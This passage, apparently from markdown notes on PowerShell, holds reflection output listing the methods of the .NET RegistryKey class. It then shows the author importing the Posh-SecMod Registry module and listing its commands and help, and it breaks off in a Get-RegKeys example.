[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]}\n\nName : OpenSubKey\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663571\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : False\nIsSecuritySafeCritical : False\nIsSecurityTransparent : True\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : Microsoft.Win32.RegistryKey\nReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey\nReturnParameter : Microsoft.Win32.RegistryKey\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {}\n\nName : get_SubKeyCount\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663572\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig, SpecialName\nCallingConvention : Standard, HasThis\nReturnType : System.Int32\nReturnTypeCustomAttributes : Int32\nReturnParameter : Int32\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : True\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]}\n\nName : get_View\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663573\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig, SpecialName\nCallingConvention : Standard, HasThis\nReturnType : Microsoft.Win32.RegistryView\nReturnTypeCustomAttributes : Microsoft.Win32.RegistryView\nReturnParameter : Microsoft.Win32.RegistryView\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : True\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]}\n\nName : get_Handle\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663574\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : False\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig, SpecialName, HasSecurity\nCallingConvention : Standard, HasThis\nReturnType : Microsoft.Win32.SafeHandles.SafeRegistryHandle\nReturnTypeCustomAttributes : Microsoft.Win32.SafeHandles.SafeRegistryHandle\nReturnParameter : Microsoft.Win32.SafeHandles.SafeRegistryHandle\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : True\nIsConstructor : False\nCustomAttributes : {[System.Security.Permissions.SecurityPermissionAttribute()], [System.Security.SecurityCriticalAttribute()]}\n\nName : FromHandle\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663575\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : False\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, Static, HideBySig, HasSecurity\nCallingConvention : Standard\nReturnType : Microsoft.Win32.RegistryKey\nReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey\nReturnParameter : Microsoft.Win32.RegistryKey\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : True\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.Permissions.SecurityPermissionAttribute()], [System.Security.SecurityCriticalAttribute()],\n [System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]}\n\nName : FromHandle\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663576\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : False\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, Static, HideBySig, HasSecurity\nCallingConvention : Standard\nReturnType : Microsoft.Win32.RegistryKey\nReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey\nReturnParameter : Microsoft.Win32.RegistryKey\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : True\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.Permissions.SecurityPermissionAttribute()], [System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)],\n [System.Security.SecurityCriticalAttribute()]}\n\nName : GetSubKeyNames\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663578\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.String[]\nReturnTypeCustomAttributes : System.String[]\nReturnParameter : System.String[]\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]}\n\nName : get_ValueCount\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663580\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig, SpecialName\nCallingConvention : Standard, HasThis\nReturnType : System.Int32\nReturnTypeCustomAttributes : Int32\nReturnParameter : Int32\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : True\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]}\n\nName : GetValueNames\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663582\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.String[]\nReturnTypeCustomAttributes : System.String[]\nReturnParameter : System.String[]\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]}\n\nName : GetValue\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663583\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.Object\nReturnTypeCustomAttributes : System.Object\nReturnParameter : System.Object\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]}\n\nName : GetValue\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663584\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.Object\nReturnTypeCustomAttributes : System.Object\nReturnParameter : System.Object\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]}\n\nName : GetValue\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663585\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.Object\nReturnTypeCustomAttributes : System.Object\nReturnParameter : System.Object\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)], [System.Security.SecuritySafeCriticalAttribute()]}\n\nName : GetValueKind\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663587\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : Microsoft.Win32.RegistryValueKind\nReturnTypeCustomAttributes : Microsoft.Win32.RegistryValueKind\nReturnParameter : Microsoft.Win32.RegistryValueKind\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)], [System.Security.SecuritySafeCriticalAttribute()]}\n\nName : get_Name\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663592\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig, SpecialName\nCallingConvention : Standard, HasThis\nReturnType : System.String\nReturnTypeCustomAttributes : System.String\nReturnParameter : System.String\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : True\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]}\n\nName : SetValue\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663594\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : False\nIsSecuritySafeCritical : False\nIsSecurityTransparent : True\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.Void\nReturnTypeCustomAttributes : Void\nReturnParameter : Void\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {}\n\nName : SetValue\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663595\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.Void\nReturnTypeCustomAttributes : Void\nReturnParameter : Void\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)], [System.Security.SecuritySafeCriticalAttribute()]}\n\nName : ToString\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663597\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, Virtual, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.String\nReturnTypeCustomAttributes : System.String\nReturnParameter : System.String\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : True\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]}\n\nName : GetAccessControl\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663598\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : False\nIsSecuritySafeCritical : False\nIsSecurityTransparent : True\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.Security.AccessControl.RegistrySecurity\nReturnTypeCustomAttributes : System.Security.AccessControl.RegistrySecurity\nReturnParameter : System.Security.AccessControl.RegistrySecurity\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {}\n\nName : GetAccessControl\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663599\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.Security.AccessControl.RegistrySecurity\nReturnTypeCustomAttributes : System.Security.AccessControl.RegistrySecurity\nReturnParameter : System.Security.AccessControl.RegistrySecurity\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]}\n\nName : SetAccessControl\nDeclaringType : Microsoft.Win32.RegistryKey\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663600\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.Void\nReturnTypeCustomAttributes : Void\nReturnParameter : Void\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]}\n\nName : GetLifetimeService\nDeclaringType : System.MarshalByRefObject\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100667337\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : False\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, Final, Virtual, HideBySig, VtableLayoutMask\nCallingConvention : Standard, HasThis\nReturnType : System.Object\nReturnTypeCustomAttributes : System.Object\nReturnParameter : System.Object\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : True\nIsVirtual : True\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecurityCriticalAttribute()]}\n\nName : InitializeLifetimeService\nDeclaringType : System.MarshalByRefObject\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100667338\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : False\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, Virtual, HideBySig, VtableLayoutMask\nCallingConvention : Standard, HasThis\nReturnType : System.Object\nReturnTypeCustomAttributes : System.Object\nReturnParameter : System.Object\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : True\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecurityCriticalAttribute()]}\n\nName : CreateObjRef\nDeclaringType : System.MarshalByRefObject\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100667339\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : False\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, Virtual, HideBySig, VtableLayoutMask\nCallingConvention : Standard, HasThis\nReturnType : System.Runtime.Remoting.ObjRef\nReturnTypeCustomAttributes : System.Runtime.Remoting.ObjRef\nReturnParameter : System.Runtime.Remoting.ObjRef\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : True\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecurityCriticalAttribute()]}\n\nName : Equals\nDeclaringType : System.Object\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663839\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : False\nIsSecuritySafeCritical : False\nIsSecurityTransparent : True\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, Virtual, HideBySig, VtableLayoutMask\nCallingConvention : Standard, HasThis\nReturnType : System.Boolean\nReturnTypeCustomAttributes : Boolean\nReturnParameter : Boolean\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : True\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[__DynamicallyInvokableAttribute()]}\n\nName : GetHashCode\nDeclaringType : System.Object\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663842\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : False\nIsSecuritySafeCritical : False\nIsSecurityTransparent : True\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, Virtual, HideBySig, VtableLayoutMask\nCallingConvention : Standard, HasThis\nReturnType : System.Int32\nReturnTypeCustomAttributes : Int32\nReturnParameter : Int32\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : IL\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : True\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[__DynamicallyInvokableAttribute()]}\n\nName : GetType\nDeclaringType : System.Object\nReflectedType : Microsoft.Win32.RegistryKey\nMemberType : Method\nMetadataToken : 100663843\nModule : CommonLanguageRuntimeLibrary\nIsSecurityCritical : True\nIsSecuritySafeCritical : True\nIsSecurityTransparent : False\nMethodHandle : System.RuntimeMethodHandle\nAttributes : PrivateScope, Public, HideBySig\nCallingConvention : Standard, HasThis\nReturnType : System.Type\nReturnTypeCustomAttributes : System.Type\nReturnParameter : System.Type\nIsGenericMethod : False\nIsGenericMethodDefinition : False\nContainsGenericParameters : False\nMethodImplementationFlags : InternalCall\nIsPublic : True\nIsPrivate : False\nIsFamily : False\nIsAssembly : False\nIsFamilyAndAssembly : False\nIsFamilyOrAssembly : False\nIsStatic : False\nIsFinal : False\nIsVirtual : False\nIsHideBySig : True\nIsAbstract : False\nIsSpecialName : False\nIsConstructor : False\nCustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()], [__DynamicallyInvokableAttribute()]}\n\nPS C:\\>\n```\n\n- [```Posh-SecMod```](https://github.com/darkoperator/Posh-SecMod) [```Registry```](https://github.com/darkoperator/Posh-SecMod/tree/master/Registry) module\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master> ls\n\n Directory: C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\n\n\nMode LastWriteTime Length Name\n---- ------------- ------ ----\nd---- 7/9/2017 5:32 PM Assemblies\nd---- 7/9/2017 5:32 PM Audit\nd---- 7/9/2017 5:32 PM Database\nd---- 7/9/2017 5:32 PM Discovery\nd---- 7/9/2017 5:32 PM Parse\nd---- 7/9/2017 5:32 PM PostExploitation\nd---- 7/9/2017 5:32 PM Registry\nd---- 7/9/2017 5:32 PM Utility\n----- 8/12/2015 8:31 AM 483 .gitattributes\n----- 8/12/2015 8:31 AM 1970 .gitignore\n----- 8/12/2015 8:31 AM 12840 LICENSE.txt\n----- 8/12/2015 8:31 AM 5554 Posh-SecMod.psd1\n----- 8/12/2015 8:31 AM 751 Posh-SecMod.psm1\n----- 8/12/2015 8:31 AM 1889 README.md\n\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master> cd .\\Registry\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry> ls\n\n Directory: C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry\n\n\nMode LastWriteTime Length Name\n---- ------------- ------ ----\n----- 8/12/2015 8:31 AM 27860 Registry.ps1\n----- 8/12/2015 8:31 AM 27864 Registry.psm1\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry> \n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry> Import-Module .\\Registry.psm1\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry> Get-Module\n\nModuleType Version Name ExportedCommands\n---------- ------- ---- ----------------\nManifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...}\nManifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...}\nScript 0.0 Registry {Get-RegKeys, Get-RegKeySecurityDescriptor, Get-RegValue, Get-RegValues...}\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry> Get-Command -Module Registry\n\nCommandType Name ModuleName\n----------- ---- ----------\nFunction Get-RegKeys Registry\nFunction Get-RegKeySecurityDescriptor Registry\nFunction Get-RegValue Registry\nFunction Get-RegValues Registry\nFunction New-RegKey Registry\nFunction Remove-RegKey Registry\nFunction Remove-RegValue Registry\nFunction Set-RegValue Registry\nFunction Test-RegKeyAccess Registry\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry> Get-Help Get-RegKeys -Examples\n\nNAME\n Get-RegKeys\n\nSYNOPSIS\n Enumerates the keys that are under a given Registry Key.\n\n -------------------------- EXAMPLE 1 --------------------------\n\n C:\\PS>Listing all of the keys under HKCU\\Software key\n\n\n PS C:\\> Get-RegKeys -Hive HKCU -Key software\n\n Key FullPath\n --- --------\n 7-Zip HKCU\\software\\7-Zip\n AppDataLow 